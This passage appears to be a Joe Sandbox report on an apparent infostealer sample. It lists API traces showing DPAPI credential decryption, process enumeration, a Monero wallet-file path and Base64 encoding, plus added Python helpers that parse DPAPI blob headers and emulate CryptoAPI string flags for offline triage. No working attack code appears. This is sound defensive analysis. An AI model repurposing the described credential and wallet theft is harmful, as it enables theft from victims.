                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *Alr$V1n$co{$qo]?$qo]?
                      • API String ID: 0-1403940330
                      • Opcode ID: 81ad1e5ce12199ab3a5437801d5e320024984013a805b9edeabb2358b46fffed
                      • Instruction ID: 4940ce7e915baf23da13b2c8e19b496c32b586c88dbb96ee242defade12db598
                      • Opcode Fuzzy Hash: 81ad1e5ce12199ab3a5437801d5e320024984013a805b9edeabb2358b46fffed
                      • Instruction Fuzzy Hash: BFB2F5F360C6049FE3046E2DEC8567AFBE9EB94320F164A3DEAC5C3744EA7558018697
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EEC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC87C
                      • lstrcat.KERNEL32(?,00F00B46), ref: 00EEC943
                      • lstrcat.KERNEL32(?,00F00B47), ref: 00EEC957
                      • lstrcat.KERNEL32(?,00F00B4E), ref: 00EEC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: ec5e2c5b9e5309fbb4b43060a746b2292f2fceed55a39d02b2aaa6d7257598f0
                      • Instruction ID: 3f683c97565d0d8f1e5f1b43cc87911748fd19881ce140dfeaed2167848fd31d
                      • Opcode Fuzzy Hash: ec5e2c5b9e5309fbb4b43060a746b2292f2fceed55a39d02b2aaa6d7257598f0
                      • Instruction Fuzzy Hash: DA416EB490420EEBCB24CFA4DC89BFEB7B8BF84304F1041A8E509A7280D7715A85DF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EE724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EE7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EE72A4
                      • LocalFree.KERNEL32(?), ref: 00EE72AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 666e74527a033ea42b974cf9a30567be0f143e79d5e00be24850bb1cfcedd2b4
                      • Instruction ID: e9409cb0deb174ae17a1e0ce41ca5304feab49a1a77f9ba19d6688ef75e921bb
                      • Opcode Fuzzy Hash: 666e74527a033ea42b974cf9a30567be0f143e79d5e00be24850bb1cfcedd2b4
                      • Instruction Fuzzy Hash: E20140B5A40208BBDB24DFD4DD46F9D7778AB44701F104054FB15BB2C4DAB0AA508B64
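The function above allocates a 0x400-byte heap buffer, calls `CryptUnprotectData` on a caller-supplied blob, converts the result with `WideCharToMultiByte` into that buffer and releases the API's output with `LocalFree`, which is how DPAPI's caller-owned output must be freed; the protected data is therefore a UTF-16 string that ends up as an ANSI copy of at most 0x400 bytes. Every DPAPI blob starts with a fixed header, and the master-key GUID in it tells an analyst which user master key is needed to decrypt a blob recovered from disk or from one of the memory dumps listed above. The Python below is an added example, not code from the sample or from the report: it parses that header and scans a buffer for blobs by the well-known DPAPI provider GUID. The field layout is the publicly documented DPAPI blob structure (as implemented by tools such as mimikatz and dpapick), the blob used for the demonstration is constructed with dummy key material, and nothing here performs any decryption.

```python
"""Parse and locate DPAPI blobs (the input format of CryptUnprotectData).

Added triage helper. Layout: the documented DPAPI blob structure; the demo
blob is built with dummy material and no cryptography is performed.
"""
import struct
import uuid

# Provider GUID found at offset 4 of every DPAPI blob (after the version DWORD)
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8003: "CALG_MD5", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _lv(buf, off):
    """DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("truncated blob")
    return bytes(buf[off:off + n]), off + n


def parse_dpapi_blob(buf: bytes) -> dict:
    version, off = _u32(buf, 0)
    provider = uuid.UUID(bytes_le=bytes(buf[off:off + 16])); off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    _mk_version, off = _u32(buf, off)
    master_key = uuid.UUID(bytes_le=bytes(buf[off:off + 16])); off += 16
    flags, off = _u32(buf, off)
    desc, off = _lv(buf, off)              # szDescription, UTF-16LE, NUL-terminated
    alg_crypt, off = _u32(buf, off)
    crypt_bits, off = _u32(buf, off)
    salt, off = _lv(buf, off)
    _strong_hmac, off = _lv(buf, off)      # normally empty
    alg_hash, off = _u32(buf, off)
    hash_bits, off = _u32(buf, off)
    _hmac2_key, off = _lv(buf, off)        # normally empty
    data, off = _lv(buf, off)              # ciphertext
    sign, off = _lv(buf, off)              # HMAC over the blob
    return {
        "master_key_guid": str(master_key), "flags": flags,
        "description": desc.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": CALG_NAMES.get(alg_crypt, hex(alg_crypt)), "crypt_bits": crypt_bits,
        "alg_hash": CALG_NAMES.get(alg_hash, hex(alg_hash)), "hash_bits": hash_bits,
        "salt": salt.hex(), "ciphertext_len": len(data), "sig_len": len(sign), "size": off,
    }


def find_dpapi_blobs(haystack: bytes):
    """Yield (offset, parsed header) for every blob located by its provider GUID."""
    needle = DPAPI_PROVIDER_GUID.bytes_le
    pos = haystack.find(needle)
    while pos != -1:
        if pos >= 4:
            try:
                yield pos - 4, parse_dpapi_blob(haystack[pos - 4:])
            except (ValueError, struct.error, UnicodeDecodeError):
                pass                       # GUID bytes without a valid header around them
        pos = haystack.find(needle, pos + 1)


def build_dpapi_blob(master_key_guid: str, description: str, ciphertext: bytes) -> bytes:
    """Serialise a structurally valid blob with DUMMY salt/signature (constructed test data)."""
    def lv(b):
        return struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<I", 0)                          # flags
            + lv(description.encode("utf-16-le") + b"\x00\x00")
            + struct.pack("<II", 0x6610, 256)               # CALG_AES_256, 256-bit
            + lv(b"\x11" * 32) + lv(b"")                    # salt, strong HMAC key
            + struct.pack("<II", 0x800E, 512)               # CALG_SHA_512, 512-bit
            + lv(b"") + lv(ciphertext) + lv(b"\x22" * 64))  # hmac2 key, data, signature


if __name__ == "__main__":
    demo = build_dpapi_blob(str(uuid.uuid4()), "constructed", b"\xaa" * 48)
    for off, info in find_dpapi_blobs(b"DPAPI" + demo):   # Chromium "Local State" style prefix
        print(off, info)
```

Running `find_dpapi_blobs` over the `.sdmp` files listed under each function is a quick way to see whether the process held DPAPI blobs in memory at dump time and which master-key GUIDs they reference.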
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF961E
                      • Process32First.KERNEL32(00F00ACA,00000128), ref: 00EF9632
                      • Process32Next.KERNEL32(00F00ACA,00000128), ref: 00EF9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00EF965C
                      • CloseHandle.KERNEL32(00F00ACA), ref: 00EF967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 5a6037531d0496cbc1bae716f0b792c987de903db5155293cb82f087c3936933
                      • Instruction ID: ac09a46370f8c1d861d92b0d95ce123a537de4bd2790cf3d8858493258d1ab4d
                      • Opcode Fuzzy Hash: 5a6037531d0496cbc1bae716f0b792c987de903db5155293cb82f087c3936933
                      • Instruction Fuzzy Hash: DE01E975A00208ABCB24DFA5D958BEDB7F8EF48301F104198EA46E7240DB759B94CF51
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F005B7), ref: 00EF86CA
                      • Process32First.KERNEL32(?,00000128), ref: 00EF86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 00EF86F3
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • CloseHandle.KERNEL32(?), ref: 00EF8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 3851cbbf5d2538bc73021727b6ebdaae482e5cfb06d2f191593d5975d7597ff6
                      • Instruction ID: 23e8848f414055c5682d207413b09d63e5ab8711b17645eeb4da6f6282ecc49f
                      • Opcode Fuzzy Hash: 3851cbbf5d2538bc73021727b6ebdaae482e5cfb06d2f191593d5975d7597ff6
                      • Instruction Fuzzy Hash: AA312AB190121CABCB28EF54DC45FEEB7B8EF45740F1041A9E60EB6190DB706A45CFA1
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00EE5184,40000001,00000000,00000000,?,00EE5184), ref: 00EF8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: f687342c3f9d9ce56127139e6cf8c0757ae0eec53201255f9715407e95ed12f1
                      • Instruction ID: dad792f4fc4fa8efe414cc36896199d7994bfc0c7b8c76c4e009461d7f8bd035
                      • Opcode Fuzzy Hash: f687342c3f9d9ce56127139e6cf8c0757ae0eec53201255f9715407e95ed12f1
                      • Instruction Fuzzy Hash: E5111C7120020CBFDB18CF64E985FB733A9AF89704F10A458FA299B240DB75EC91DB60
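The two `CryptStringToBinaryA` calls at 00EE9AEF and 00EE9B2A bracket a `LocalAlloc(0x40, …)`: the first call, with `pbBinary` NULL, only returns the required size, the buffer is then allocated with LPTR (0x40 = LMEM_FIXED | LMEM_ZEROINIT) and the second call fills it. Their `dwFlags` value 0x00000001 is CRYPT_STRING_BASE64; the 0x40000001 passed to `CryptBinaryToStringA` at 00EF8EC0 is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, i.e. single-line Base64 without the CRLF line wrapping CryptoAPI otherwise inserts; the lstrlen/CryptStringToBinaryA/lstrcat routine at 00EEC871 decodes a string the same way before concatenating fragments onto it. The Python below is an added example, not code from the sample or from the report: it names those flag bits from wincrypt.h and emulates the decode and encode formats this sample uses, so strings recovered from the dumps can be handled identically offline. Only BASE64, BASE64HEADER and HEX are emulated, the other formats raise, and the inputs used for demonstration are constructed.

```python
"""Decode CRYPT_STRING_* flags and emulate the CryptoAPI string conversions.

Added triage helper; constants are the wincrypt.h values, and only the formats
this sample uses (plus BASE64HEADER and HEX) are emulated.
"""
import base64
import binascii
import re

CRYPT_STRING_FORMATS = {            # low byte selects the format
    0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
    0x2: "CRYPT_STRING_BINARY",      0x3: "CRYPT_STRING_BASE64REQUESTHEADER",
    0x4: "CRYPT_STRING_HEX",         0x5: "CRYPT_STRING_HEXASCII",
    0x6: "CRYPT_STRING_BASE64_ANY",  0x7: "CRYPT_STRING_ANY",
    0x8: "CRYPT_STRING_HEX_ANY",     0x9: "CRYPT_STRING_BASE64X509CRLHEADER",
    0xA: "CRYPT_STRING_HEXADDR",     0xB: "CRYPT_STRING_HEXASCIIADDR",
    0xC: "CRYPT_STRING_HEXRAW",
}
CRYPT_STRING_MODIFIERS = {          # high bits are OR-ed onto the format
    0x20000000: "CRYPT_STRING_STRICT",
    0x40000000: "CRYPT_STRING_NOCRLF",
    0x80000000: "CRYPT_STRING_NOCR",
}
LPTR = 0x0040                       # LocalAlloc flag in the trace: LMEM_FIXED | LMEM_ZEROINIT


def describe_flags(flags: int) -> list:
    """Name the format and modifier bits of a dwFlags value such as 0x40000001."""
    fmt = flags & 0xFF
    names = [CRYPT_STRING_FORMATS.get(fmt, f"unknown format 0x{fmt:x}")]
    names += [n for bit, n in CRYPT_STRING_MODIFIERS.items() if flags & bit]
    leftover = flags & ~0xFF & ~sum(CRYPT_STRING_MODIFIERS)
    if leftover:
        names.append(f"unknown modifier 0x{leftover:08x}")
    return names


def crypt_string_to_binary(text: str, flags: int) -> bytes:
    """Emulate CryptStringToBinaryA for the formats this sample relies on."""
    fmt = flags & 0xFF
    if fmt == 0x1:                                 # BASE64: whitespace and CRLF are skipped
        return base64.b64decode(re.sub(r"\s+", "", text), validate=True)
    if fmt == 0x0:                                 # BASE64HEADER: -----BEGIN/END----- framed
        body = [ln.strip() for ln in text.splitlines()
                if ln.strip() and not ln.startswith("-----")]
        return base64.b64decode("".join(body), validate=True)
    if fmt == 0x4:                                 # HEX: "68 65 6c ..." with optional breaks
        return binascii.unhexlify(re.sub(r"\s+", "", text))
    raise NotImplementedError(describe_flags(flags)[0])


def crypt_binary_to_string(data: bytes, flags: int) -> str:
    """Emulate CryptBinaryToStringA for BASE64 with the NOCRLF / NOCR modifiers."""
    if flags & 0xFF != 0x1:
        raise NotImplementedError(describe_flags(flags)[0])
    b64 = base64.b64encode(data).decode("ascii")
    if flags & 0x40000000:                         # NOCRLF: one line, no terminator
        return b64
    eol = "\n" if flags & 0x80000000 else "\r\n"   # NOCR: LF instead of CRLF
    # default layout: 64 columns, every line including the last is terminated
    return "".join(b64[i:i + 64] + eol for i in range(0, len(b64), 64))


def decode_like_sample(text: str, flags: int = 0x1) -> bytes:
    """Mirror the call sequence at 00EE9AEF..00EE9B3F."""
    needed = len(crypt_string_to_binary(text, flags))   # call 1: pbBinary=NULL, size only
    buf = bytearray(needed)                             # LocalAlloc(LPTR, needed): zeroed
    buf[:] = crypt_string_to_binary(text, flags)        # call 2: decode into the buffer
    return bytes(buf)                                   # caller uses it, then LocalFree()


if __name__ == "__main__":
    print(describe_flags(0x40000001))
    sample = base64.b64encode(b"constructed sample").decode("ascii")   # constructed input
    print(decode_like_sample(sample))
```

The NOCRLF flag matters for matching: Base64 produced by this sample is a single line, so a detection or decoder that expects the 64-column CRLF layout CryptoAPI emits by default will not line up with what the sample writes or sends.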
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F00E00,00000000,?), ref: 00EF79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00F00E00,00000000,?), ref: 00EF79C4
                      • wsprintfA.USER32 ref: 00EF79F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0168DBA8,00000000,?,00F00E10,00000000,?,00000000,00000000), ref: 00EF7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0168DBA8,00000000,?,00F00E10,00000000,?,00000000,00000000,?), ref: 00EF7A7D
                      • wsprintfA.USER32 ref: 00EF7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !eww$"}$ Zr
                      • API String ID: 0-3614521819
                      APIs
                      • CoCreateInstance.COMBASE(00EFE118,00000000,00000001,00EFE108,00000000), ref: 00EF3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EF37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE9BA3
                      • LocalFree.KERNEL32(?), ref: 00EE9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @a~u$mHP$s[q~
                      • API String ID: 0-4263036448
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: VnoM$d/?
                      • API String ID: 0-723397907
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: :Ro;
                      • API String ID: 0-2189730635
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7.;+
                      • API String ID: 0-3999621782
                      Strings
                      Memory Dump Source
